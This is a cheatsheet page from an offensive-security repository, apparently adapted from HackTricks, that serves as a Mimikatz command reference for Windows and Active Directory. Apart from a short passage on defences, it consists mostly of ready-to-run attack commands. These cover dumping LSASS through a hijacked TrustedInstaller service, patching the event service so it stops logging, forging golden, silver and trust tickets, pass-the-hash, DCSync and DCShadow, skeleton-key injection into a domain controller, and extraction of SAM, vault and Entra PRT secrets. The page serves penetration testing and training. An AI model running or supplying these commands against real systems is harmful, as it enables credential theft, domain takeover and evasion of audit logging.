daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

credentials-mimikatz.md (11800B)


      1 ---
      2 title: "Mimikatz"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/stealing-credentials/credentials-mimikatz.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/stealing-credentials/credentials-mimikatz.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Mimikatz
     14 
     15 **This page is based on one from [adsecurity.org](https://adsecurity.org/?page_id=1821)**. Check the original for further info!<sup>[[3]](#references)</sup>
     16 
     17 ## LM and Clear-Text in memory
     18 
     19 From Windows 8.1 and Windows Server 2012 R2 onwards, significant measures have been implemented to safeguard against credential theft:
     20 
     21 - **LM hashes and plain-text passwords** are no longer stored in memory to enhance security. A specific registry setting, _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_ must be configured with a DWORD value of `0` to disable Digest Authentication, ensuring "clear-text" passwords are not cached in LSASS.
     22 
     23 - **LSA Protection** is introduced to shield the Local Security Authority (LSA) process from unauthorized memory reading and code injection. This is achieved by marking the LSASS as a protected process. Activation of LSA Protection involves:
     24   1. Modifying the registry at _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ by setting `RunAsPPL` to `dword:00000001`.
     25   2. Implementing a Group Policy Object (GPO) that enforces this registry change across managed devices.
     26 
     27 Despite these protections, tools like Mimikatz can circumvent LSA Protection using specific drivers, although such actions are likely to be recorded in event logs.
     28 
     29 On modern workstations this matters even more because **Credential Guard is enabled by default on many Windows 11 22H2+ and Windows Server 2025 domain-joined, non-DC systems**, while **LSASS-as-PPL is enabled by default on fresh Windows 11 22H2+ installs**. In practice, this means `sekurlsa::logonpasswords` often yields less material than older tradecraft expected and operators increasingly pivot to **offline minidumps**, **Kerberos key extraction (`sekurlsa::ekeys`)**, or **CloudAP/PRT-oriented modules**. For the protection side, check [Windows credentials protections](/hacktricks/windows-hardening/stealing-credentials/credentials-protections).
     30 
     31 ### Counteracting SeDebugPrivilege Removal
     32 
     33 Administrators typically have SeDebugPrivilege, enabling them to debug programs. This privilege can be restricted to prevent unauthorized memory dumps, a common technique used by attackers to extract credentials from memory. However, even with this privilege removed, the TrustedInstaller account can still perform memory dumps using a customized service configuration:
     34 
     35 ```bash
     36 sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
     37 sc start TrustedInstaller
     38 ```
     39 
     40 This allows the dumping of the `lsass.exe` memory to a file, which can then be analyzed on another system to extract credentials:
     41 
     42 ```text
     43 # privilege::debug
     44 # sekurlsa::minidump lsass.dmp
     45 # sekurlsa::logonpasswords
     46 ```
     47 
     48 ## Mimikatz Options
     49 
     50 Event log tampering in Mimikatz involves two primary actions: clearing event logs and patching the Event service to prevent logging of new events. Below are the commands for performing these actions:
     51 
     52 #### Clearing Event Logs
     53 
     54 - **Command**: This action is aimed at deleting the event logs, making it harder to track malicious activities.
     55 - Mimikatz does not provide a direct command in its standard documentation for clearing event logs directly via its command line. However, event log manipulation typically involves using system tools or scripts outside of Mimikatz to clear specific logs (e.g., using PowerShell or Windows Event Viewer).
     56 
     57 #### Experimental Feature: Patching the Event Service
     58 
     59 - **Command**: `event::drop`
     60 - This experimental command is designed to modify the Event Logging Service's behavior, effectively preventing it from recording new events.
     61 - Example: `mimikatz "privilege::debug" "event::drop" exit`
     62 
     63 - The `privilege::debug` command ensures that Mimikatz operates with the necessary privileges to modify system services.
     64 - The `event::drop` command then patches the Event Logging service.
     65 
     66 ### Kerberos Ticket Attacks
     67 
     68 Use the commands below as quick syntax reminders. The dedicated pages for [golden tickets](/hacktricks/windows-hardening/active-directory-methodology/golden-ticket), [silver tickets](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket), [diamond tickets](/hacktricks/windows-hardening/active-directory-methodology/diamond-ticket), and [over-pass-the-hash / pass-the-key](/hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key) contain the up-to-date AES/PAC/opsec nuances.
     69 
     70 ### Golden Ticket Creation
     71 
     72 A Golden Ticket allows for domain-wide access impersonation. Key command and parameters:
     73 
     74 - Command: `kerberos::golden`
     75 - Parameters:
     76   - `/domain`: The domain name.
     77   - `/sid`: The domain's Security Identifier (SID).
     78   - `/user`: The username to impersonate.
     79   - `/krbtgt`: The NTLM hash of the domain's KDC service account.
     80   - `/ptt`: Directly injects the ticket into memory.
     81   - `/ticket`: Saves the ticket for later use.
     82 
     83 Example:
     84 
     85 ```bash
     86 mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
     87 ```
     88 
     89 ### Silver Ticket Creation
     90 
     91 Silver Tickets grant access to specific services. Key command and parameters:
     92 
     93 - Command: Similar to Golden Ticket but targets specific services.
     94 - Parameters:
     95   - `/service`: The service to target (e.g., cifs, http).
     96   - Other parameters similar to Golden Ticket.
     97 
     98 Example:
     99 
    100 ```bash
    101 mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
    102 ```
    103 
    104 ### Trust Ticket Creation
    105 
    106 Trust Tickets are used for accessing resources across domains by leveraging trust relationships. Key command and parameters:
    107 
    108 - Command: Similar to Golden Ticket but for trust relationships.
    109 - Parameters:
    110   - `/target`: The target domain's FQDN.
    111   - `/rc4`: The NTLM hash for the trust account.
    112 
    113 Example:
    114 
    115 ```bash
    116 mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
    117 ```
    118 
    119 ### Additional Kerberos Commands
    120 
    121 - **Listing Tickets**:
    122 
    123   - Command: `kerberos::list`
    124   - Lists all Kerberos tickets for the current user session.
    125 
    126 - **Pass the Cache**:
    127 
    128   - Command: `kerberos::ptc`
    129   - Injects Kerberos tickets from cache files.
    130   - Example: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
    131 
    132 - **Pass the Ticket**:
    133 
    134   - Command: `kerberos::ptt`
    135   - Allows using a Kerberos ticket in another session.
    136   - Example: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
    137 
    138 - **Purge Tickets**:
    139   - Command: `kerberos::purge`
    140   - Clears all Kerberos tickets from the session.
    141   - Useful before using ticket manipulation commands to avoid conflicts.
    142 
    143 ### Over-Pass-the-Hash / Pass-the-Key
    144 
    145 If `RC4` is disabled or unreliable, Mimikatz can patch **AES128/AES256 Kerberos keys** into the current logon session instead of only using an NT hash. This is usually a better fit for modern domains than treating `sekurlsa::pth` as NTLM-only.<sup>[[1]](#references)</sup>
    146 
    147 ```bash
    148 mimikatz "privilege::debug" "sekurlsa::ekeys" exit
    149 mimikatz "sekurlsa::pth /user:svc_sql /domain:corp.local /aes256:<AES256_HEX> /run:powershell.exe" exit
    150 mimikatz "sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NT_HASH> /impersonate" exit
    151 ```
    152 
    153 `/impersonate` reuses the current process instead of spawning a new console, which is handy when you want to immediately run things like `lsadump::dcsync` in the same context.
    154 
    155 ### Active Directory Tampering
    156 
    157 - **DCShadow**: Temporarily make a machine act as a DC for AD object manipulation. See [DCShadow](/hacktricks/windows-hardening/active-directory-methodology/dcshadow).
    158 
    159   - `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
    160 
    161 - **DCSync**: Mimic a DC to request password data. See [DCSync](/hacktricks/windows-hardening/active-directory-methodology/dcsync).
    162   - `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
    163 
    164 ### Credential Access
    165 
    166 - **LSADUMP::LSA**: Extract credentials from LSA.
    167 
    168   - `mimikatz "lsadump::lsa /inject" exit`
    169 
    170 - **LSADUMP::NetSync**: Impersonate a DC using a computer account's password data.
    171 
    172   - _No specific command provided for NetSync in original context._
    173 
    174 - **LSADUMP::SAM**: Access local SAM database.
    175 
    176   - `mimikatz "lsadump::sam" exit`
    177 
    178 - **LSADUMP::Secrets**: Decrypt secrets stored in the registry.
    179 
    180   - `mimikatz "lsadump::secrets" exit`
    181 
    182 - **LSADUMP::SetNTLM**: Set a new NTLM hash for a user.
    183 
    184   - `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
    185 
    186 - **LSADUMP::Trust**: Retrieve trust authentication information.
    187   - `mimikatz "lsadump::trust" exit`
    188 
    189 ### Cloud credentials / Entra ID
    190 
    191 On **Entra ID** or **hybrid-joined** hosts, `sekurlsa::cloudap` can expose cached **Primary Refresh Token (PRT)** material from LSASS. If the associated Proof-of-Possession key is software-protected, `dpapi::cloudapkd` can derive the clear/derived key material needed for follow-on **Pass-the-PRT** workflows.<sup>[[1]](#references)</sup>
    192 
    193 ```bash
    194 mimikatz "privilege::debug" "sekurlsa::cloudap" exit
    195 mimikatz "dpapi::cloudapkd /keyvalue:<ProofOfPossessionKey> /unprotect" exit
    196 mimikatz "dpapi::cloudapkd /context:<CONTEXT> /derivedkey:<DERIVED_KEY> /prt:<PRT>" exit
    197 ```
    198 
    199 This becomes much harder when the key is TPM-backed, but it is worth checking on hybrid endpoints because the cached CloudAP data may be more interesting than classic `wdigest` output.<sup>[[2]](#references)</sup> For the cloud-side abuse chain, see [Pass the PRT](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html).
    200 
    201 ### Miscellaneous
    202 
    203 - **MISC::Skeleton**: Inject a backdoor into LSASS on a DC.
    204   - `mimikatz "privilege::debug" "misc::skeleton" exit`
    205 
    206 ### Privilege Escalation
    207 
    208 - **PRIVILEGE::Backup**: Acquire backup rights.
    209 
    210   - `mimikatz "privilege::backup" exit`
    211 
    212 - **PRIVILEGE::Debug**: Obtain debug privileges.
    213   - `mimikatz "privilege::debug" exit`
    214 
    215 ### Credential Dumping
    216 
    217 - **SEKURLSA::LogonPasswords**: Show credentials for logged-on users.
    218 
    219   - `mimikatz "sekurlsa::logonpasswords" exit`
    220 
    221 - **SEKURLSA::Tickets**: Extract Kerberos tickets from memory.
    222   - `mimikatz "sekurlsa::tickets /export" exit`
    223 
    224 ### Sid and Token Manipulation
    225 
    226 - **SID::add/modify**: Change SID and SIDHistory.
    227 
    228   - Add: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
    229   - Modify: _No specific command for modify in original context._
    230 
    231 - **TOKEN::Elevate**: Impersonate tokens.
    232   - `mimikatz "token::elevate /domainadmin" exit`
    233 
    234 ### Terminal Services
    235 
    236 - **TS::MultiRDP**: Allow multiple RDP sessions.
    237 
    238   - `mimikatz "ts::multirdp" exit`
    239 
    240 - **TS::Sessions**: List TS/RDP sessions.
    241   - _No specific command provided for TS::Sessions in original context._
    242 
    243 ### Vault
    244 
    245 - Extract passwords from Windows Vault.
    246   - `mimikatz "vault::cred /patch" exit`
    247 
    248 
    249 ## References
    250 
    251 - [1] [The Hacker Tools – Mimikatz modules](https://tools.thehacker.recipes/mimikatz/modules/)
    252 - [2] [Synacktiv – WHFB and Entra ID: Say Hello to your new cache flow](https://www.synacktiv.com/en/publications/whfb-and-entra-id-say-hello-to-your-new-cache-flow)
    253 - [3] [Mimikatz command reference](https://adsecurity.org/?page_id=1821)